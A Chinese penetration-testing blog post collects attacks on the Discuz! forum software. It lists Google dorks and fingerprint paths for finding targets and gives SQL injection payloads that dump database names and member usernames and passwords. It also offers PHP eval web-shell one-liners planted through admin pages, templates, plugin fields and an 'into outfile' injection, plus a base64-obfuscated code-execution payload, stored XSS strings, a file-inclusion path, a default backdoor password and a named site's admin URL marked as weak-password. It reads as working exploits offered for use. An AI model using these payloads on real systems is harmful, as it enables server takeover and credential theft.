最新文章:

首页 渗透测试

discuz漏洞大全

发布时间:2019年05月23日 评论数:抢沙发 阅读数:299

    Discuz漏洞拿服务器

     

    Google关键字以及常有目录:

     

    #范例:链接------关键字------CMS别称

    #范例:连接------正则表达式------匹配关键字------CMS别称

    /------Powered by.*?<------Discuz!------Discuz(康盛)

    /------Powered by.*?</a></strong>------Discuz!------Discuz(康盛)

    /robots.txt------discuz------Discuz(康盛)

    /bbcode.js------discuz------Discuz(康盛)

    /newsfader.js------discuz------Discuz(康盛)

    /templates.cdb------discuz------Discuz(康盛)

    /u2upopup.js------discuz------Discuz(康盛)

    /admin/discuzfiles.md5------discuz------Discuz(康盛)

    /api/manyou/cloud_channel.htm------discuz------Discuz(康盛)

    /images/admincp/admincp.js------discuz------Discuz(康盛)

    /include/javascript/ajax.js------discuz------Discuz(康盛)

    /mspace/default/style.ini------discuz------Discuz(康盛)

    /plugins/manyou/discuz_plugin_manyou.xml------discuz------Discuz(康盛)

    /source/plugin/myapp/discuz_plugin_myapp.xml------discuz------Discuz(康盛)

    /static/js/admincp.js------discuz------Discuz(康盛)

    /template/default/common/common.css------discuz------Discuz(康盛)

    /uc_server/view/default/admin_frame_main.htm------discuz------Discuz(康盛)

    /bbcode.js------discuz------Discuz(康盛)

    /newsfader.js------discuz------Discuz(康盛)

    /templates.cdb------discuz------Discuz(康盛)

    /u2upopup.js------discuz------Discuz(康盛)

    /mspace/default1/style.ini------discuz------Discuz(康盛)

    /uc_server/view/default/admin_frame_main.htm------discuz------Discuz(康盛)

     

    Discuz的基本漏洞:

    discuz x1.5 discuz 7.2 后台getshell 0day通杀0day

    Discuz 某插件SQL注入漏洞

    Discuz! 7.1 & 7.2 远程代码执行漏洞

    discuz! 7.2 manyou插件暴路径&Get Webshell 0day

    Discuz! 7.2-X1 心情墙插件SQL注入及持久型XSS漏洞

    Discuz!账号发放插件注入0day

    Discuz7.X通杀0day漏洞(UCenter Home-2.0)

     

    1,  dz-ychat插件注入漏洞

    漏洞链接:http://**.**.**.**/plugin.php?id=ychat&mod=rooms&cid=6x

    2,  dz-sql注入

    漏洞链接:http://www.xxcom/faq.php?action=...

    3, 源代码外泄下载导致漏洞的发生

    漏洞链接:http://***.com/bbs.tar.gz

    4,  Discuz急诊箱没有关闭,默认密码188281MWWxjk即可登录

    漏洞链接:http://www.**.com/source/plugin/tools/tools.php

    5,  Discuz弱口令导致漏洞的发生

    漏洞链接:http://bbs.wan.58.com/uc_server/admin.php

     

    http://bbs.wan.58.com/uc_server/admin.php?sid=b962WHAGm3MydvyKLeEcvoQSS7pPPjkGuZTz270fNQqi5F6HeOsah6osA7nzMTxlpuiMuJAz3%2BZADQ  弱口令admin

    6,  discuz X2.5 

    漏洞描述:广播回复存在 xss漏洞 html、脚本未过滤

    7,  discus x2 SQL注入漏洞

    漏洞链接:http://www.**.com/source\module\forum\forum_attachment.php

    8,  基本的路径的文件

    /uc_server/control/admin/db.php

    /source/plugin/myrepeats/table/table_myrepeats.php

    /install/include/install_lang.php

    9,  dz x1.5  dzx7.2漏洞

    后台:插件--添加插件--请选择导入方式:上传本帖附件中的XML文件并同时勾选上 允许导入不同版本 Discuz! 的插件(易产生错误!!)

    shell地址就为:data/plugindata/shell.lang.php(discuz x1.5 )

    shell地址就为:forumdata/plugins/shell.lang.php (discuz 7.2)

    10,Discuz7.X通杀0day漏洞(UCenter Home-2.0)

    Dork : Powered by UCenter inurl:shop.php?ac=view

    Dork 2 : inurl:shop.php?ac=view&amp;shopid=

           Vuln file : Shop.php

    Poc文件

    shop.php?ac=view&shopid=4 and (select 1 from(select count(*),concat((select (select concat(0x7e,0×27,unhex(hex(database())),0×27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

    11, dz账号发放插件注入0day

    2Fly 序号发放系统

    文件2fly_gift.php

    Exp文件

    Exp:http://www.xxx.com/2fly_gift.php?pages=content&gameid=16 and 1=2 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from cdb_members

    关键字查找:

    inurl:2fly_gift.php

    12,dz7.2 心情墙插件

    存在xss插件,持久性的

    在发表心情处直接插入html代码

    “><script>alert(/xss/)</script>

    Sql注入网站,比较鸡肋,已经差不多没有le

    漏洞链接:http://www.**.com/plugin.php?id=moodwall&action=edit_mood&moodid=2

     

    13,dz manyou插件暴路径

    文件./manyou.source/notice.php

    /userapp.php?script=notice&view=all&option=deluserapp&action=invite&hash=' union select NULL,NULL,NULL,NULL,0x3C3F70687020406576616C28245F504F53545B274F275D293B3F3E,NULL,NULL,NULL,NULL into outfile 'C:/inetpub/wwwroot/shell.php'%23

    /manyou/admincp.php?my_suffix=%0A%0DTOBY57 爆路径

    14,dz备份文件的一些基本的路径

    /config/config_global.php.bak

    /config/config_ucenter.php.bak

    /config.inc.php.bak

    15,dz6.1后台拿shell

    http://127.0.0.1/discuz/admincp.php?action=runwizard&frames=yes

    admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell

    <?php eval($_POST[cmd]);?>

    后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php

    后台模板管理--默认模板套系--详情

    templates/default/actions.lang.php 

    jhackj\\');eval($_POST[cmd])?>;//

    16Discuz X2.5 最新GetShell 0day 详细利用方法

    在实现上存在远程命令执行漏洞,远程攻击者可利用此漏洞执行远程任意代码。

    要成功利用此漏洞需要目标启用seo功能。

     漏洞文件:upload\source\class\helper\helper_seo.php

     在后台设置了,前台就能通过添加特殊内容进行命令执行

     先上图后上代码 大家目测吧

    下面说下利用方法

    1).注册任意账户

    2).登陆用户,发表blog日志(注意是日志

    3).添加图片,选择网络图片,地址写入 

    {${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}

    4).访问日志,论坛根目录下生成demo.php,一句发密码

    漏洞要开启seo,并且开启用户日志的seo,漏洞鸡肋,黑站就算了。

    补充一下吧,开seo没错,但是并非他说的非得开日志的seo,我上面文章中说的“各种地方比如source/include/space/space_blog.php

    懂的都懂了”只是随便提个例子而已,其实在任何能够发表文章的地方都可以,最简单的,论坛找个板块发贴子就行,

    这主要看管理员开启了哪个位置的seo,如果不知道管理员开了哪的seo就到处都发一下。

    利用方式也并非非得发blog,也不是非得发网络图片,详细的利用我是比如随便发个贴子,内容

    ${${eval(chr(112).chr(104).chr(112).chr(105).chr(110).chr(102).chr(111).chr(40).chr(41).chr(59))}}

    然后给他加上任意超链接,发布即可phpinfo()enjoy it :)

    17[email]2” onmouseover=”alert(2)[/email]

    Xss漏洞

    注入一个用户,然后发表新的日志,插入这句话,然后我们点击编辑,就弹出来了

    18dz x3.1越权回帖

    当我们访问一个论坛的时候,可能会有一些可能需要vip会员,不能回复帖子,咋办,我们点击下面的分享,然后,点击同时回复,我们就回复成功了,成功的看到了隐藏的文件

    19,某插件存在漏洞

    Inurl:plugin.php?id=dc_mail

    使用文件包含来操作

    **/plugin.php?action=../../../../../data/attachment/forum/201508/02/201508/02/153404ryzl4yytgyz4yjrl.jpg%00&id=dc_mall

    20,强制回复

    点击回复帖子,发现不能回复,F12,然后我们修改下面的<a href>修改成

    <a href="http://xxx.xxx.xxx/forum.php?mod=post&amp;action=reply&amp;fid=170&amp;tid=9310" onclick="showWindow('repl y', this.href)">回复</a>

    然后再次点击回复帖子

    21,好货站长联盟插件注入

    点击导入已有接口信息

    App Key出添加一句话1234’;eval($_POST[1]);//

    接着找/data/dzapp-haodai-config.php

    然后就shell

    访问/data/dzapp-haodai-config.php,下面1=phpinfo()


二维码加载中...
本文作者:h4ck1r      文章标题: discuz漏洞大全
本文地址:https://www.hackexp.cn/?post=11
版权声明:若无注明,本文皆为“h4ck1r's Blog”原创,转载请保留文章出处。
挤眼 亲亲 咆哮 开心 想想 可怜 糗大了 委屈 哈哈 小声点 右哼哼 左哼哼 疑问 坏笑 赚钱啦 悲伤 耍酷 勾引 厉害 握手 耶 嘻嘻 害羞 鼓掌 馋嘴 抓狂 抱抱 围观 威武 给力
提交评论

清空信息
关闭评论
正在加载中……
sitemap